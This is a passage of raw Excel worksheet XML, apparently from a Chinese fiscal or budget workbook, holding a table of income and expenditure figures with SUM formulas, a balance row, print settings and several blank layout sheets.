  <headerFooter scaleWithDoc="0" alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet27.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:I16"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="C11" sqref="C11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="31.25390625" style="27" customWidth="1"/>
    <col min="2" max="2" width="14.375" style="27" customWidth="1"/>
    <col min="3" max="3" width="15.50390625" style="28" customWidth="1"/>
    <col min="4" max="7" width="15.50390625" style="26" customWidth="1"/>
    <col min="8" max="8" width="18.375" style="27" customWidth="1"/>
    <col min="9" max="16384" width="9.00390625" style="27" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="13.5" customHeight="1">
      <c r="A1" s="29"/>
      <c r="B1" s="30"/>
      <c r="C1" s="30"/>
      <c r="D1" s="31"/>
      <c r="E1" s="31"/>
      <c r="F1" s="31"/>
      <c r="G1" s="31"/>
    </row>
    <row r="2" spans="1:7" ht="31.5" customHeight="1">
      <c r="A2" s="32" t="s">
        <v>1704</v>
      </c>
      <c r="B2" s="32"/>
      <c r="C2" s="32"/>
      <c r="D2" s="32"/>
      <c r="E2" s="32"/>
      <c r="F2" s="32"/>
      <c r="G2" s="32"/>
    </row>
    <row r="3" spans="1:7" ht="19.5" customHeight="1">
      <c r="A3" s="33" t="s">
        <v>1705</v>
      </c>
      <c r="B3" s="34"/>
      <c r="C3" s="30"/>
      <c r="D3" s="35"/>
      <c r="E3" s="35"/>
      <c r="F3" s="35"/>
      <c r="G3" s="36" t="s">
        <v>1639</v>
      </c>
    </row>
    <row r="4" spans="1:7" ht="48.75" customHeight="1">
      <c r="A4" s="37" t="s">
        <v>1658</v>
      </c>
      <c r="B4" s="38" t="s">
        <v>1659</v>
      </c>
      <c r="C4" s="38" t="s">
        <v>1662</v>
      </c>
      <c r="D4" s="39" t="s">
        <v>1706</v>
      </c>
      <c r="E4" s="38" t="s">
        <v>1707</v>
      </c>
      <c r="F4" s="39" t="s">
        <v>1665</v>
      </c>
      <c r="G4" s="39" t="s">
        <v>1666</v>
      </c>
    </row>
    <row r="5" spans="1:9" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A5" s="40" t="s">
        <v>1668</v>
      </c>
      <c r="B5" s="41">
        <f>SUM(C5+D5+E5+F5+G5)</f>
        <v>578148</v>
      </c>
      <c r="C5" s="41">
        <f aca="true" t="shared" si="0" ref="C5:G5">SUM(C6:C10)</f>
        <v>41368</v>
      </c>
      <c r="D5" s="41">
        <f t="shared" si="0"/>
        <v>170225</v>
      </c>
      <c r="E5" s="41">
        <f t="shared" si="0"/>
        <v>331355</v>
      </c>
      <c r="F5" s="41">
        <f t="shared" si="0"/>
        <v>23106</v>
      </c>
      <c r="G5" s="41">
        <f t="shared" si="0"/>
        <v>12094</v>
      </c>
      <c r="H5" s="42"/>
      <c r="I5" s="42"/>
    </row>
    <row r="6" spans="1:9" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A6" s="43" t="s">
        <v>1684</v>
      </c>
      <c r="B6" s="41">
        <f aca="true" t="shared" si="1" ref="B6:B16">SUM(C6+D6+E6+F6+G6)</f>
        <v>331146</v>
      </c>
      <c r="C6" s="41">
        <v>26503</v>
      </c>
      <c r="D6" s="41">
        <v>167735</v>
      </c>
      <c r="E6" s="41">
        <v>103050</v>
      </c>
      <c r="F6" s="41">
        <v>22764</v>
      </c>
      <c r="G6" s="41">
        <v>11094</v>
      </c>
      <c r="H6" s="42"/>
      <c r="I6" s="44"/>
    </row>
    <row r="7" spans="1:9" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A7" s="43" t="s">
        <v>1685</v>
      </c>
      <c r="B7" s="41">
        <f t="shared" si="1"/>
        <v>5034</v>
      </c>
      <c r="C7" s="41">
        <v>200</v>
      </c>
      <c r="D7" s="41">
        <v>2280</v>
      </c>
      <c r="E7" s="41">
        <v>1524</v>
      </c>
      <c r="F7" s="41">
        <v>330</v>
      </c>
      <c r="G7" s="41">
        <v>700</v>
      </c>
      <c r="H7" s="44"/>
      <c r="I7" s="44"/>
    </row>
    <row r="8" spans="1:9" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A8" s="43" t="s">
        <v>1686</v>
      </c>
      <c r="B8" s="41">
        <f t="shared" si="1"/>
        <v>241256</v>
      </c>
      <c r="C8" s="41">
        <v>14545</v>
      </c>
      <c r="D8" s="41"/>
      <c r="E8" s="41">
        <v>226711</v>
      </c>
      <c r="F8" s="41"/>
      <c r="G8" s="41"/>
      <c r="H8" s="44"/>
      <c r="I8" s="44"/>
    </row>
    <row r="9" spans="1:9" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A9" s="43" t="s">
        <v>1687</v>
      </c>
      <c r="B9" s="41">
        <f t="shared" si="1"/>
        <v>183</v>
      </c>
      <c r="C9" s="41"/>
      <c r="D9" s="41">
        <v>101</v>
      </c>
      <c r="E9" s="41">
        <v>70</v>
      </c>
      <c r="F9" s="41">
        <v>12</v>
      </c>
      <c r="G9" s="41"/>
      <c r="H9" s="44"/>
      <c r="I9" s="44"/>
    </row>
    <row r="10" spans="1:9" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A10" s="43" t="s">
        <v>1688</v>
      </c>
      <c r="B10" s="41">
        <f t="shared" si="1"/>
        <v>529</v>
      </c>
      <c r="C10" s="41">
        <v>120</v>
      </c>
      <c r="D10" s="41">
        <v>109</v>
      </c>
      <c r="E10" s="41"/>
      <c r="F10" s="41"/>
      <c r="G10" s="41">
        <v>300</v>
      </c>
      <c r="H10" s="44"/>
      <c r="I10" s="44"/>
    </row>
    <row r="11" spans="1:9" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A11" s="43" t="s">
        <v>1675</v>
      </c>
      <c r="B11" s="41">
        <f t="shared" si="1"/>
        <v>564586</v>
      </c>
      <c r="C11" s="41">
        <f aca="true" t="shared" si="2" ref="C11:G11">SUM(C12:C15)</f>
        <v>46820</v>
      </c>
      <c r="D11" s="41">
        <f t="shared" si="2"/>
        <v>149486</v>
      </c>
      <c r="E11" s="41">
        <f t="shared" si="2"/>
        <v>330725</v>
      </c>
      <c r="F11" s="41">
        <f t="shared" si="2"/>
        <v>26368</v>
      </c>
      <c r="G11" s="41">
        <f t="shared" si="2"/>
        <v>11187</v>
      </c>
      <c r="H11" s="42"/>
      <c r="I11" s="44"/>
    </row>
    <row r="12" spans="1:9" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A12" s="43" t="s">
        <v>1690</v>
      </c>
      <c r="B12" s="41">
        <f t="shared" si="1"/>
        <v>516417</v>
      </c>
      <c r="C12" s="41">
        <v>46720</v>
      </c>
      <c r="D12" s="41">
        <v>149112</v>
      </c>
      <c r="E12" s="41">
        <v>288627</v>
      </c>
      <c r="F12" s="41">
        <v>25594</v>
      </c>
      <c r="G12" s="41">
        <v>6364</v>
      </c>
      <c r="H12" s="42"/>
      <c r="I12" s="44"/>
    </row>
    <row r="13" spans="1:9" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A13" s="43" t="s">
        <v>1691</v>
      </c>
      <c r="B13" s="41">
        <f t="shared" si="1"/>
        <v>46197</v>
      </c>
      <c r="C13" s="41"/>
      <c r="D13" s="41"/>
      <c r="E13" s="41">
        <v>42098</v>
      </c>
      <c r="F13" s="41">
        <v>334</v>
      </c>
      <c r="G13" s="41">
        <v>3765</v>
      </c>
      <c r="H13" s="42"/>
      <c r="I13" s="44"/>
    </row>
    <row r="14" spans="1:9" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A14" s="43" t="s">
        <v>1692</v>
      </c>
      <c r="B14" s="41">
        <f t="shared" si="1"/>
        <v>474</v>
      </c>
      <c r="C14" s="41">
        <v>100</v>
      </c>
      <c r="D14" s="41">
        <v>374</v>
      </c>
      <c r="E14" s="41"/>
      <c r="F14" s="41"/>
      <c r="G14" s="41"/>
      <c r="H14" s="44"/>
      <c r="I14" s="44"/>
    </row>
    <row r="15" spans="1:7" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A15" s="43" t="s">
        <v>1693</v>
      </c>
      <c r="B15" s="41">
        <f t="shared" si="1"/>
        <v>1498</v>
      </c>
      <c r="C15" s="41"/>
      <c r="D15" s="41"/>
      <c r="E15" s="41"/>
      <c r="F15" s="41">
        <v>440</v>
      </c>
      <c r="G15" s="41">
        <v>1058</v>
      </c>
    </row>
    <row r="16" spans="1:7" s="26" customFormat="1" ht="28.5" customHeight="1">
      <c r="A16" s="43" t="s">
        <v>1680</v>
      </c>
      <c r="B16" s="41">
        <f t="shared" si="1"/>
        <v>13562</v>
      </c>
      <c r="C16" s="41">
        <f aca="true" t="shared" si="3" ref="C16:G16">C5-C11</f>
        <v>-5452</v>
      </c>
      <c r="D16" s="41">
        <f t="shared" si="3"/>
        <v>20739</v>
      </c>
      <c r="E16" s="41">
        <f t="shared" si="3"/>
        <v>630</v>
      </c>
      <c r="F16" s="41">
        <f t="shared" si="3"/>
        <v>-3262</v>
      </c>
      <c r="G16" s="41">
        <f t="shared" si="3"/>
        <v>907</v>
      </c>
    </row>
    <row r="17" s="26" customFormat="1" ht="14.25" customHeight="1"/>
    <row r="18" s="26" customFormat="1" ht="14.25" customHeight="1"/>
    <row r="19" s="26" customFormat="1" ht="14.25" customHeight="1"/>
    <row r="20" s="26" customFormat="1" ht="14.25" customHeight="1"/>
    <row r="21" ht="14.25" customHeight="1"/>
    <row r="22" ht="14.25" customHeight="1"/>
    <row r="23" ht="14.25" customHeight="1"/>
    <row r="24" ht="14.25" customHeight="1"/>
    <row r="25" ht="14.25" customHeight="1"/>
    <row r="26" ht="14.25" customHeight="1"/>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A2:G2"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.47" footer="0.47"/>
  <pageSetup firstPageNumber="56" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter scaleWithDoc="0" alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet28.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="B9:B17"/>
  <sheetViews>
    <sheetView workbookViewId="0" topLeftCell="A1">
      <selection activeCell="B10" sqref="B10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="22.125" style="0" customWidth="1"/>
    <col min="2" max="2" width="73.25390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="46.5" customHeight="1"/>
    <row r="2" ht="24.75" customHeight="1"/>
    <row r="4" ht="14.25" hidden="1"/>
    <row r="5" ht="14.25" hidden="1"/>
    <row r="9" ht="63" customHeight="1">
      <c r="B9" s="21" t="s">
        <v>1708</v>
      </c>
    </row>
    <row r="10" ht="63" customHeight="1">
      <c r="B10" s="22"/>
    </row>
    <row r="11" ht="14.25">
      <c r="B11" s="23"/>
    </row>
    <row r="12" ht="14.25">
      <c r="B12" s="23"/>
    </row>
    <row r="13" ht="14.25">
      <c r="B13" s="23"/>
    </row>
    <row r="14" ht="14.25">
      <c r="B14" s="23"/>
    </row>
    <row r="15" ht="30" customHeight="1">
      <c r="B15" s="23"/>
    </row>
    <row r="16" ht="32.25" customHeight="1">
      <c r="B16" s="24"/>
    </row>
    <row r="17" ht="29.25" customHeight="1">
      <c r="B17" s="25"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <printOptions/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet29.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:M30"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="100" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="U43" sqref="U43"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <sheetData>
    <row r="1" spans="1:13" ht="14.25">
      <c r="A1" s="4"/>
      <c r="B1" s="4"/>
      <c r="C1" s="4"/>
      <c r="D1" s="4"/>
      <c r="E1" s="4"/>
      <c r="F1" s="4"/>
      <c r="G1" s="4"/>
      <c r="H1" s="4"/>
      <c r="I1" s="4"/>
      <c r="J1" s="4"/>
      <c r="K1" s="4"/>
      <c r="L1" s="4"/>
      <c r="M1" s="4"/>
    </row>
    <row r="2" spans="1:13" ht="14.25">
      <c r="A2" s="4"/>
      <c r="B2" s="4"/>
      <c r="C2" s="4"/>
      <c r="D2" s="4"/>
      <c r="E2" s="4"/>
      <c r="F2" s="4"/>
      <c r="G2" s="4"/>
      <c r="H2" s="4"/>
      <c r="I2" s="4"/>
      <c r="J2" s="4"/>
      <c r="K2" s="4"/>
      <c r="L2" s="4"/>
      <c r="M2" s="4"/>
    </row>
    <row r="3" spans="1:13" ht="14.25">
      <c r="A3" s="4"/>
      <c r="B3" s="4"/>
      <c r="C3" s="4"/>
      <c r="D3" s="4"/>
      <c r="E3" s="4"/>
      <c r="F3" s="4"/>
      <c r="G3" s="4"/>
      <c r="H3" s="4"/>
      <c r="I3" s="4"/>
      <c r="J3" s="4"/>
      <c r="K3" s="4"/>
      <c r="L3" s="4"/>
      <c r="M3" s="4"/>
    </row>
    <row r="4" spans="1:13" ht="14.25">
      <c r="A4" s="4"/>
      <c r="B4" s="4"/>
      <c r="C4" s="4"/>
      <c r="D4" s="4"/>
      <c r="E4" s="4"/>
      <c r="F4" s="4"/>
      <c r="G4" s="4"/>
      <c r="H4" s="4"/>
      <c r="I4" s="4"/>
      <c r="J4" s="4"/>
      <c r="K4" s="4"/>
      <c r="L4" s="4"/>
      <c r="M4" s="4"/>
    </row>
    <row r="5" spans="1:13" ht="14.25">
      <c r="A5" s="4"/>
      <c r="B5" s="4"/>
      <c r="C5" s="4"/>
      <c r="D5" s="4"/>
      <c r="E5" s="4"/>
      <c r="F5" s="4"/>
      <c r="G5" s="4"/>
      <c r="H5" s="4"/>
      <c r="I5" s="4"/>
      <c r="J5" s="4"/>
      <c r="K5" s="4"/>
      <c r="L5" s="4"/>
      <c r="M5" s="4"/>
    </row>
    <row r="6" spans="1:13" ht="14.25">
      <c r="A6" s="4"/>
      <c r="B6" s="4"/>
      <c r="C6" s="4"/>
      <c r="D6" s="4"/>
      <c r="E6" s="4"/>
      <c r="F6" s="4"/>
      <c r="G6" s="4"/>
      <c r="H6" s="4"/>
      <c r="I6" s="4"/>
      <c r="J6" s="4"/>
      <c r="K6" s="4"/>
      <c r="L6" s="4"/>
      <c r="M6" s="4"/>
    </row>
    <row r="7" spans="1:13" ht="14.25">
      <c r="A7" s="4"/>
      <c r="B7" s="4"/>
      <c r="C7" s="4"/>
      <c r="D7" s="4"/>
      <c r="E7" s="4"/>
      <c r="F7" s="4"/>
      <c r="G7" s="4"/>
      <c r="H7" s="4"/>
      <c r="I7" s="4"/>
      <c r="J7" s="4"/>
      <c r="K7" s="4"/>
      <c r="L7" s="4"/>
      <c r="M7" s="4"/>
    </row>
    <row r="8" spans="1:13" ht="14.25">
      <c r="A8" s="4"/>
      <c r="B8" s="4"/>
      <c r="C8" s="4"/>
      <c r="D8" s="4"/>
      <c r="E8" s="4"/>
      <c r="F8" s="4"/>
      <c r="G8" s="4"/>
      <c r="H8" s="4"/>
      <c r="I8" s="4"/>
      <c r="J8" s="4"/>
      <c r="K8" s="4"/>
      <c r="L8" s="4"/>
      <c r="M8" s="4"/>
    </row>
    <row r="9" spans="1:13" ht="14.25">
      <c r="A9" s="4"/>
      <c r="B9" s="4"/>
      <c r="C9" s="4"/>
      <c r="D9" s="4"/>
      <c r="E9" s="4"/>
      <c r="F9" s="4"/>
      <c r="G9" s="4"/>
      <c r="H9" s="4"/>
      <c r="I9" s="4"/>
      <c r="J9" s="4"/>
      <c r="K9" s="4"/>
      <c r="L9" s="4"/>
      <c r="M9" s="4"/>
    </row>
    <row r="10" spans="1:13" ht="14.25">
      <c r="A10" s="4"/>
      <c r="B10" s="4"/>
      <c r="C10" s="4"/>
      <c r="D10" s="4"/>
      <c r="E10" s="4"/>
      <c r="F10" s="4"/>
      <c r="G10" s="4"/>
      <c r="H10" s="4"/>
      <c r="I10" s="4"/>
      <c r="J10" s="4"/>
      <c r="K10" s="4"/>
      <c r="L10" s="4"/>
      <c r="M10" s="4"/>
    </row>
    <row r="11" spans="1:13" ht="14.25">
      <c r="A11" s="4"/>
      <c r="B11" s="4"/>
      <c r="C11" s="4"/>
      <c r="D11" s="4"/>
      <c r="E11" s="4"/>
      <c r="F11" s="4"/>
      <c r="G11" s="4"/>
      <c r="H11" s="4"/>
      <c r="I11" s="4"/>
      <c r="J11" s="4"/>
      <c r="K11" s="4"/>
      <c r="L11" s="4"/>
      <c r="M11" s="4"/>
    </row>
    <row r="12" spans="1:13" ht="14.25">
      <c r="A12" s="4"/>
      <c r="B12" s="4"/>
      <c r="C12" s="4"/>
      <c r="D12" s="4"/>
      <c r="E12" s="4"/>
      <c r="F12" s="4"/>
      <c r="G12" s="4"/>
      <c r="H12" s="4"/>
      <c r="I12" s="4"/>
      <c r="J12" s="4"/>
      <c r="K12" s="4"/>
      <c r="L12" s="4"/>
      <c r="M12" s="4"/>
    </row>
    <row r="13" spans="1:13" ht="14.25">
      <c r="A13" s="4"/>
      <c r="B13" s="4"/>
      <c r="C13" s="4"/>
      <c r="D13" s="4"/>
      <c r="E13" s="4"/>
      <c r="F13" s="4"/>
      <c r="G13" s="4"/>
      <c r="H13" s="4"/>
      <c r="I13" s="4"/>
      <c r="J13" s="4"/>
      <c r="K13" s="4"/>
      <c r="L13" s="4"/>
      <c r="M13" s="4"/>
    </row>
    <row r="14" spans="1:13" ht="14.25">
      <c r="A14" s="4"/>
      <c r="B14" s="4"/>
      <c r="C14" s="4"/>
      <c r="D14" s="4"/>
      <c r="E14" s="4"/>
      <c r="F14" s="4"/>
      <c r="G14" s="4"/>
      <c r="H14" s="4"/>
      <c r="I14" s="4"/>
      <c r="J14" s="4"/>
      <c r="K14" s="4"/>
      <c r="L14" s="4"/>
      <c r="M14" s="4"/>
    </row>
    <row r="15" spans="1:13" ht="14.25">
      <c r="A15" s="4"/>
      <c r="B15" s="4"/>
      <c r="C15" s="4"/>
      <c r="D15" s="4"/>
      <c r="E15" s="4"/>
      <c r="F15" s="4"/>
      <c r="G15" s="4"/>
      <c r="H15" s="4"/>
      <c r="I15" s="4"/>
      <c r="J15" s="4"/>
      <c r="K15" s="4"/>
      <c r="L15" s="4"/>
      <c r="M15" s="4"/>
    </row>
    <row r="16" spans="1:13" ht="14.25">
      <c r="A16" s="4"/>
      <c r="B16" s="4"/>
      <c r="C16" s="4"/>
      <c r="D16" s="4"/>
      <c r="E16" s="4"/>
      <c r="F16" s="4"/>
      <c r="G16" s="4"/>
      <c r="H16" s="4"/>
      <c r="I16" s="4"/>
      <c r="J16" s="4"/>
      <c r="K16" s="4"/>
      <c r="L16" s="4"/>
      <c r="M16" s="4"/>
    </row>
    <row r="17" spans="1:13" ht="14.25">
      <c r="A17" s="4"/>
      <c r="B17" s="4"/>
      <c r="C17" s="4"/>
      <c r="D17" s="4"/>
      <c r="E17" s="4"/>
      <c r="F17" s="4"/>
      <c r="G17" s="4"/>
      <c r="H17" s="4"/>
      <c r="I17" s="4"/>
      <c r="J17" s="4"/>
      <c r="K17" s="4"/>
      <c r="L17" s="4"/>
      <c r="M17" s="4"/>
    </row>
    <row r="18" spans="1:13" ht="14.25">
      <c r="A18" s="4"/>
      <c r="B18" s="4"/>
      <c r="C18" s="4"/>
      <c r="D18" s="4"/>
      <c r="E18" s="4"/>
      <c r="F18" s="4"/>
      <c r="G18" s="4"/>
      <c r="H18" s="4"/>
      <c r="I18" s="4"/>
      <c r="J18" s="4"/>
      <c r="K18" s="4"/>
      <c r="L18" s="4"/>
      <c r="M18" s="4"/>
    </row>
    <row r="19" spans="1:13" ht="14.25">
      <c r="A19" s="4"/>
      <c r="B19" s="4"/>
      <c r="C19" s="4"/>
      <c r="D19" s="4"/>
      <c r="E19" s="4"/>
      <c r="F19" s="4"/>
      <c r="G19" s="4"/>
      <c r="H19" s="4"/>
      <c r="I19" s="4"/>
      <c r="J19" s="4"/>
      <c r="K19" s="4"/>
      <c r="L19" s="4"/>
      <c r="M19" s="4"/>
    </row>
    <row r="20" spans="1:13" ht="14.25">
      <c r="A20" s="4"/>
      <c r="B20" s="4"/>
      <c r="C20" s="4"/>
      <c r="D20" s="4"/>
      <c r="E20" s="4"/>
      <c r="F20" s="4"/>
      <c r="G20" s="4"/>
      <c r="H20" s="4"/>
      <c r="I20" s="4"/>
      <c r="J20" s="4"/>
      <c r="K20" s="4"/>
      <c r="L20" s="4"/>
      <c r="M20" s="4"/>
    </row>
    <row r="21" spans="1:13" ht="14.25">
      <c r="A21" s="4"/>
      <c r="B21" s="4"/>
      <c r="C21" s="4"/>
      <c r="D21" s="4"/>
      <c r="E21" s="4"/>
      <c r="F21" s="4"/>
      <c r="G21" s="4"/>
      <c r="H21" s="4"/>
      <c r="I21" s="4"/>
      <c r="J21" s="4"/>
      <c r="K21" s="4"/>
      <c r="L21" s="4"/>
      <c r="M21" s="4"/>
    </row>
    <row r="22" spans="1:13" ht="14.25">
      <c r="A22" s="4"/>
      <c r="B22" s="4"/>
      <c r="C22" s="4"/>
      <c r="D22" s="4"/>
      <c r="E22" s="4"/>
      <c r="F22" s="4"/>
      <c r="G22" s="4"/>
      <c r="H22" s="4"/>
      <c r="I22" s="4"/>
      <c r="J22" s="4"/>
      <c r="K22" s="4"/>
      <c r="L22" s="4"/>
      <c r="M22" s="4"/>
    </row>
    <row r="23" spans="1:13" ht="14.25">
      <c r="A23" s="4"/>
      <c r="B23" s="4"/>
      <c r="C23" s="4"/>
      <c r="D23" s="4"/>
      <c r="E23" s="4"/>
      <c r="F23" s="4"/>
      <c r="G23" s="4"/>
      <c r="H23" s="4"/>
      <c r="I23" s="4"/>
      <c r="J23" s="4"/>
      <c r="K23" s="4"/>
      <c r="L23" s="4"/>
      <c r="M23" s="4"/>
    </row>
    <row r="24" spans="1:13" ht="14.25">
      <c r="A24" s="4"/>
      <c r="B24" s="4"/>
      <c r="C24" s="4"/>
      <c r="D24" s="4"/>
      <c r="E24" s="4"/>
      <c r="F24" s="4"/>
      <c r="G24" s="4"/>
      <c r="H24" s="4"/>
      <c r="I24" s="4"/>
      <c r="J24" s="4"/>
      <c r="K24" s="4"/>
      <c r="L24" s="4"/>
      <c r="M24" s="4"/>
    </row>
    <row r="25" spans="1:13" ht="14.25">
      <c r="A25" s="4"/>
      <c r="B25" s="4"/>
      <c r="C25" s="4"/>
      <c r="D25" s="4"/>
      <c r="E25" s="4"/>
      <c r="F25" s="4"/>
      <c r="G25" s="4"/>
      <c r="H25" s="4"/>
      <c r="I25" s="4"/>
      <c r="J25" s="4"/>
      <c r="K25" s="4"/>
      <c r="L25" s="4"/>
      <c r="M25" s="4"/>
    </row>
    <row r="26" spans="1:13" ht="14.25">
      <c r="A26" s="4"/>
      <c r="B26" s="4"/>
      <c r="C26" s="4"/>
      <c r="D26" s="4"/>
      <c r="E26" s="4"/>
      <c r="F26" s="4"/>
      <c r="G26" s="4"/>
      <c r="H26" s="4"/>
      <c r="I26" s="4"/>
      <c r="J26" s="4"/>
      <c r="K26" s="4"/>
      <c r="L26" s="4"/>
      <c r="M26" s="4"/>
    </row>
    <row r="27" spans="1:13" ht="14.25">
      <c r="A27" s="4"/>
      <c r="B27" s="4"/>
      <c r="C27" s="4"/>
      <c r="D27" s="4"/>
      <c r="E27" s="4"/>
      <c r="F27" s="4"/>
      <c r="G27" s="4"/>
      <c r="H27" s="4"/>
      <c r="I27" s="4"/>
      <c r="J27" s="4"/>
      <c r="K27" s="4"/>
      <c r="L27" s="4"/>
      <c r="M27" s="4"/>
    </row>
    <row r="28" spans="1:13" ht="14.25">
      <c r="A28" s="4"/>
      <c r="B28" s="4"/>
      <c r="C28" s="4"/>
      <c r="D28" s="4"/>
      <c r="E28" s="4"/>
      <c r="F28" s="4"/>
      <c r="G28" s="4"/>
      <c r="H28" s="4"/>
      <c r="I28" s="4"/>
      <c r="J28" s="4"/>
      <c r="K28" s="4"/>
      <c r="L28" s="4"/>
      <c r="M28" s="4"/>
    </row>
    <row r="29" spans="1:13" ht="14.25">
      <c r="A29" s="4"/>
      <c r="B29" s="4"/>
      <c r="C29" s="4"/>
      <c r="D29" s="4"/>
      <c r="E29" s="4"/>
      <c r="F29" s="4"/>
      <c r="G29" s="4"/>
      <c r="H29" s="4"/>
      <c r="I29" s="4"/>
      <c r="J29" s="4"/>
      <c r="K29" s="4"/>
      <c r="L29" s="4"/>
      <c r="M29" s="4"/>
    </row>
    <row r="30" spans="1:13" ht="14.25">
      <c r="A30" s="4"/>
      <c r="B30" s="4"/>
      <c r="C30" s="4"/>
      <c r="D30" s="4"/>
      <c r="E30" s="4"/>
      <c r="F30" s="4"/>
      <c r="G30" s="4"/>
      <c r="H30" s="4"/>
      <c r="I30" s="4"/>
      <c r="J30" s="4"/>
      <c r="K30" s="4"/>
      <c r="L30" s="4"/>
      <c r="M30" s="4"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:M30"/>
  </mergeCells>
  <printOptions/>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M30"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="100" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="V13" sqref="V13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <sheetData>
    <row r="1" spans="1:13" ht="14.25">
      <c r="A1" s="4"/>
      <c r="B1" s="4"/>
      <c r="C1" s="4"/>
      <c r="D1" s="4"/>
      <c r="E1" s="4"/>
      <c r="F1" s="4"/>
      <c r="G1" s="4"/>
      <c r="H1" s="4"/>
      <c r="I1" s="4"/>
      <c r="J1" s="4"/>
      <c r="K1" s="4"/>
      <c r="L1" s="4"/>
      <c r="M1" s="4"/>
    </row>
    <row r="2" spans="1:13" ht="14.25">
      <c r="A2" s="4"/>
      <c r="B2" s="4"/>
      <c r="C2" s="4"/>
      <c r="D2" s="4"/>
      <c r="E2" s="4"/>
      <c r="F2" s="4"/>
      <c r="G2" s="4"/>
      <c r="H2" s="4"/>
      <c r="I2" s="4"/>
      <c r="J2" s="4"/>
      <c r="K2" s="4"/>
      <c r="L2" s="4"/>
      <c r="M2" s="4"/>
    </row>
    <row r="3" spans="1:13" ht="14.25">
      <c r="A3" s="4"/>
      <c r="B3" s="4"/>
      <c r="C3" s="4"/>
      <c r="D3" s="4"/>
      <c r="E3" s="4"/>
      <c r="F3" s="4"/>
      <c r="G3" s="4"/>
      <c r="H3" s="4"/>
      <c r="I3" s="4"/>
      <c r="J3" s="4"/>
      <c r="K3" s="4"/>
      <c r="L3" s="4"/>
      <c r="M3" s="4"/>
    </row>
    <row r="4" spans="1:13" ht="14.25">
      <c r="A4" s="4"/>
      <c r="B4" s="4"/>
      <c r="C4" s="4"/>
      <c r="D4" s="4"/>
      <c r="E4" s="4"/>
      <c r="F4" s="4"/>
      <c r="G4" s="4"/>
      <c r="H4" s="4"/>
      <c r="I4" s="4"/>
      <c r="J4" s="4"/>
      <c r="K4" s="4"/>
      <c r="L4" s="4"/>
      <c r="M4" s="4"/>
    </row>
    <row r="5" spans="1:13" ht="14.25">
      <c r="A5" s="4"/>
      <c r="B5" s="4"/>
      <c r="C5" s="4"/>
      <c r="D5" s="4"/>
      <c r="E5" s="4"/>
      <c r="F5" s="4"/>
      <c r="G5" s="4"/>
      <c r="H5" s="4"/>
      <c r="I5" s="4"/>
      <c r="J5" s="4"/>
      <c r="K5" s="4"/>
      <c r="L5" s="4"/>
      <c r="M5" s="4"/>
    </row>
    <row r="6" spans="1:13" ht="14.25">
      <c r="A6" s="4"/>
      <c r="B6" s="4"/>
      <c r="C6" s="4"/>
      <c r="D6" s="4"/>
      <c r="E6" s="4"/>
      <c r="F6" s="4"/>
      <c r="G6" s="4"/>
      <c r="H6" s="4"/>
      <c r="I6" s="4"/>
      <c r="J6" s="4"/>
      <c r="K6" s="4"/>
      <c r="L6" s="4"/>
      <c r="M6" s="4"/>
    </row>
    <row r="7" spans="1:13" ht="14.25">
      <c r="A7" s="4"/>
      <c r="B7" s="4"/>
      <c r="C7" s="4"/>
      <c r="D7" s="4"/>
      <c r="E7" s="4"/>
      <c r="F7" s="4"/>
      <c r="G7" s="4"/>
      <c r="H7" s="4"/>
      <c r="I7" s="4"/>
      <c r="J7" s="4"/>
      <c r="K7" s="4"/>
      <c r="L7" s="4"/>
      <c r="M7" s="4"/>
    </row>
